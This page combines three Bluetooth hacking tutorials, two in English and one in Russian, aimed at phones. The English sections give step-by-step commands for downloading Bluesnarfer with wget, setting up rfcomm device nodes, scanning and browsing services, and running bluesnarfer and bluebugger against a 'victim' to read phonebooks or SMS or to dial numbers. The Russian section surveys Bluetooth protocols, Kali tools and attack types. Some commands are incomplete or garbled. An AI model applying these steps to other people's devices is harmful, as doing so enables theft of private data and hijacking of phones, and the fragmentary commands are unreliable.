- (Kali Linux Tutorial) How To Hack Phones With Bluetooth!
- Как взломать Bluetooth, Часть 1: термины, технологии и безопасность
- Основы Bluetooth
- Основные инструменты Linux для работы с Bluetooth
- Стек протоколов Bluetooth
- Безопасность Bluetooth
- Инструменты для взлома Bluetooth в Kali
- Некоторые атаки на Bluetooth
- How To Hack Smartphone Bluetooth Using Kali Linux
- Step 1: Fire up your Kali Linux
- Step 2: First let’s configure the Bluetooth Open terminal and type:
- Step 3: and type the hciconfig to enable your Bluetooth Adapter
- Step 4: Scan for Bluetooth devices
- Step 5: Scan for Services with sdptool
- Step 6: Ping the device with L2ping command
- Step 7: Hacking Start
(Kali Linux Tutorial) How To Hack Phones With Bluetooth!
A brief tutorial on how to hack a phone via Bluetooth using Bluesnarfer. For Backtrack/Kali Linux: First, we must install Bluesnarfer Make your way to the opt directory.
Get Bluesnarfer using the wget command
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz
Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
To extract we use the simple tar xvf command
/opt# tar xvf bluesnarfer.tar.gz
Reopen the directory once again and you will see Bluesnarfer there
Let’s enter that folder so
Now we finish it off by compiling the installation like this
To see all of the Bluesnarfer commands run this command ./bluesnarfer
Now that we have Bluesnarfer, you must configure rfcomm first, if you haven’t already done that,
mkdir -p /dev/bluetooth/rfcomm mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 mknod --mode=666 /dev/rfcomm0 c 216 0 hciconfig -i hci0 up hciconfig hci0
(ping the victim to see if he is awake)
(browse the victim for rfcomm channels to connect to)
sdptool browse —tree —l2cap
(then you can use bluesnarfer for example to read the victim’s phonebook, dial a number or read Sms or other things.)
(to see available options to do )
Extra: This is what the Bluesnarfer shell should look like
bluesnarfer, version 0.1 - usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD: valid AT+CMD (GSM EXTENSION)TYPE: valid phonebook type .. example: "DC" (dialed call list) "SM" (SIM phonebook) "RC" (recevied call list) "XX" much more-b bdaddr: Bluetooth device address -C chan: Bluetooth rfcomm channel-c ATCMD: custom action -r N-M: read phonebook entry N to M -w N-M: delete phonebook entry N to M -f name: search "name" in phonebook address -s TYPE: select phonebook memory storage -l: list available phonebook memory storage -i: device info
Как взломать Bluetooth, Часть 1: термины, технологии и безопасность
Эта новая серия, посвящённая взлому Bluetooth, была написана под впечатлением от недавнего эпизода «Мистера Робота» (моего любимого ТВ-сериала). В эпизоде 6 Эллиот взломал bluetooth-клавиатуру полицейского участка, чтобы получить доступ к системе безопасности тюрьмы и освободить своего заклятого врага Веру. Это лишь один из многих взломов, которые мы рассмотрим на протяжении данной серии статей.
Сегодня Bluetooth встроен почти во все наши гаджеты. Им оборудованы компьютеры, смартфоны, плееры iPod, планшеты, наушники, игровые контроллеры и многие другие устройства. В этом цикле статей мы сосредоточим внимание на взломе мобильных устройств, планшетов и телефонов, поскольку они являются наиболее частой целью хакеров. Возможность взлома Bluetooth может подвергнуть опасности любую информацию, хранящуюся на устройстве (фотографии, электронные письма, тексты и так далее). Кроме этого злоумышленник сможет получить контроль над устройством и отправлять на него нежелательные данные.
Но прежде чем мы приступим к взлому Bluetooth, нам нужно понять эту технологию и её термины, а так же разобраться с системой безопасности, использующейся в Bluetooth, если мы хотим добиться своей цели. В краткой публикации вроде этой, я не могу передать вам все сведения о Блютуз, но поделюсь базовыми знаниями, которые вы сможете использовать в последующих руководствах/взломах.
Основы Bluetooth
Bluetooth — универсальный протокол с низким энергопотреблением для связи ближнего действия, работающий в диапазоне 2,4-2,485 ГГц расширенного спектра. При этом несущая частота сигнала скачкообразно меняется со скоростью 1600 скачков в секунду (это сделано в целях безопасности). Он был разработан в 1994 году шведской компанией Ericsson и назван в честь короля Дании Харальда Синезубого, правившего в X веке (Дания и Швеция тогда были единой страной).
Минимальной рабочей дистанцией Bluetooth является 10 метров, но производители ничем не ограничены и могут изменять характеристику дальности работы в своих устройствах. Многие устройства способны общаться, даже если находятся на расстоянии 100 метров друг от друга. Воспользовавшись специальными антеннами, мы можем ещё сильнее расширить рабочий диапазон.
Процесс соединения двух Bluetooth устройств называется сопряжением. Почти любые два устройства, поддерживающие Блютуз, могут подключиться друг к другу. Все видимые устройства Bluetooth транслируют следующую информацию:
При сопряжении устройства обмениваются совместно используемым секретным ключом связи. Каждое из них хранит этот ключ для идентификации другого, во время будущих сопряжений.
Каждое устройство имеет уникальный 48-разрядный идентификатор (наподобие MAC адреса), а также имя, назначенное производителем.
Вот диаграмма процесса сопряжения Bluetooth. Хотя за последние годы его защита усилилась, он остаётся уязвимым, что мы и продемонстрируем в будущих руководствах этого цикла.
Bluetooth устройства создают так называемую пикосеть или очень маленькую сеть. В пикосети может существовать одно главное и до семи активных вспомогательных устройств. Поскольку Bluetooth скачкообразно изменяет частоту сигнала (1600 раз в секунду), эти устройства не мешают друг другу, ведь шансы того, что два устройства будут одновременно использовать одну и ту же частоту, очень малы.
Основные инструменты Linux для работы с Bluetooth
Реализация стек протоколов Bluetooth в Linux называется BlueZ. В большинстве дистрибутивов Linux она установлена по умолчанию. В крайнем случае, вы всегда можете найти её в своём репозитории. В нашей Kali Linux, как и следовало ожидать, эти протоколы установлены по умолчанию.
В BlueZ входит несколько простых инструментов, которые мы можем использовать для управления и последующего взлома Bluetooth. К ним относятся:
- hciconfig: Этот инструмент работает почти так же, как ifconfig в Linux, за исключением того, что передаёт информацию только о Bluetooth устройствах. Как вы можете видеть на скриншоте ниже, я воспользовался им, чтобы показать интерфейс Bluetooth (hci0) и запросить спецификации конкретного устройства.
- hcitool: Это инструмент для запроса данных. Он может сообщить нам имя устройства, его идентификатор, класс и сигнал тактирования.
- hcidump: Этот инструмент позволяет нам перехватывать коммуникации Bluetooth.
Стек протоколов Bluetooth
Стек протоколов Bluetooth выглядит вот так.
Устройствам Bluetooth не обязательно использовать все протоколы стека (например, TCP/IP). Стек Bluetooth был разработан, для того, чтобы различные коммуникационные приложения могли использовать Bluetooth в своих целях. В общем случае, программа воспользуется только одним вертикальным срезом этого стека. Слой протоколов Bluetooth и связанные с ним протоколы перечислены ниже.
- Основные протоколы Bluetooth: LMP, L2CAP, SDP
- Протокол замены кабеля: RFCOMM
- Протокол управления телефонией: TCS Binary, AT-commands
- Заимствованные протоколы: PPP, UDP/TCP/IP, OBEX, WAP, vCard, vCal, IrMC, WAE
В дополнение к слоям протоколов, спецификация Bluetooth также определяет интерфейс хост-контроллер (HCI). Он обеспечивает командный интерфейс для связи с контроллером базовой полосы, менеджер канала связи, а также доступ к данным о состоянии оборудования и управляющим регистрам. Отсюда и названия вышеприведённых инструментов: hciconfig, hcidump и hcitool.
Безопасность Bluetooth
Система безопасности Bluetooth базируется на нескольких техниках. Во-первых, скачкообразном изменении частоты. Алгоритм изменения частоты известен как главному, так и вспомогательному устройству, но не третьим лицам. Во-вторых, секретный ключ, обмен которым происходит при сопряжении. Он используется для аутентификации и шифрования (128-разрядного). Существует три режима безопасности Bluetooth. Вот они:
- Режим безопасности 1: Активная защита отключена.
- Режим безопасности 2: Защита на уровне сервисов. Аутентификацией, конфигурацией и авторизацией занимается централизованный менеджер безопасности. Не может быть активирован пользователем. Защита на уровне устройства отсутствует.
- Режим безопасности 3: Защита на уровне устройства. Аутентификация и шифрование на основе секретного ключа. Всегда включён. Принудительно активирует защиту для низкоуровневых подключений.
Инструменты для взлома Bluetooth в Kali
В Kali встроено несколько инструментов для взлома Bluetooth, которые мы будем использовать на протяжении этого цикла руководств. Кроме этого, нам придётся скачать и установить другие инструменты. Чтобы ознакомиться со списком установленных инструментов для работы с Bluetooth, откройте Приложения -> Kali Linux -> Беспроводные атаки -> Инструменты Bluetooth.
Здесь вы найдёте несколько инструментов для выполнения атак на Bluetooth. Давайте кратко рассмотрим каждый из них.
- Bluelog: Инструмент для обнаружения устройств bluetooth. Он сканирует окружающее пространство в поисках видимых устройств и заносит их в файл.
- Bluemaho: Набор инструментов с графическим интерфейсом для тестирования безопасности Bluetooth устройств.
- Blueranger: Простой скрипт, написанный на Python, который использует i2cap сигналы для обнаружения Bluetooth устройств и определения примерного расстояния до них.
- Btscanner: Этот инструмент, обладающий графическим интерфейсом, сканирует видимые устройства в пределах рабочего диапазона.
- Redfang: Этот инструмент позволяет нам находить скрытые Bluetooth устройства.
- Spooftooph: Это инструмент для спуфинга Bluetooth.
Некоторые атаки на Bluetooth
- Blueprinting: Процесс футпринтинга (получения карты сети).
- Bluesnarfing: Эта атака крадёт данные с устройства, поддерживающего Bluetooth. К ним относятся SMS, текстовые сообщения, информация календаря, изображения, адресная книга и чаты.
- Bluebugging: Атакующий получать полный контроль над телефоном цели. Для автоматического исполнения этой атаки было разработано приложения Bloover.
- Bluejacking: Атакующий отправляет жертве «визитку» (текстовое сообщение). Если пользователь добавит её в свой список контактов, злоумышленник получит возможность отправлять дополнительные сообщения.
- Bluesmack: DoS атака против устройств Bluetooth.
Ждите следующей статьи, мои начинающие хакеры =) Источник
How To Hack Smartphone Bluetooth Using Kali Linux
In this tutorial, we’re going to hack into smartphone Bluetooth using Kali Linux operating system. Let’s get started!
Step 1: Fire up your Kali Linux
If you don’t have a Kali Linux setup then you might need to follow this tutorial to fire up Kali Linux.
Step 2: First let’s configure the Bluetooth Open terminal and type:
mkdir -p /dev/Bluetooth/rfcomm mknod -m 666 /dev/Bluetooth/rfcomm/0 c 216 0
This is bluesnarfer don, now for bluebugger:
mknod –mode=666 /dev/rfcomm0 c 216 0
Step 3: and type the hciconfig to enable your Bluetooth Adapter
Step 4: Scan for Bluetooth devices
For this purpose, you can use hcitool. This is a command-line tool.
Now, let’s try the inq command in hcitool to get more information about these devices:
It also displays the clock offset and the class. The class indicates what type of Bluetooth device it is.
You can see a list of more options by typing hcitool.
Step 5: Scan for Services with sdptool
or you can use this command also…
sdptools browse –tree –l2cap
If you ask me what this shows. I don’t know. But yes it shows you all the services and channels.
Service discovery protocol (SDP) is a Bluetooth protocol. And it helps you to search for services running on the device.
Step 6: Ping the device with L2ping command
If you don’t get a ping then good luck.
Step 7: Hacking Start
And you will see its options. Now we have some options let’s type:
bluesnarfer [options] -C 7 -b
bluebugger –h bluebugger [OPTIONS] -c 7 -a [MODE]
Again, you’ll see some results. And if you are getting any error type
hciconfig hci0 down hciconfig hci0 reset hciconfig hci0 up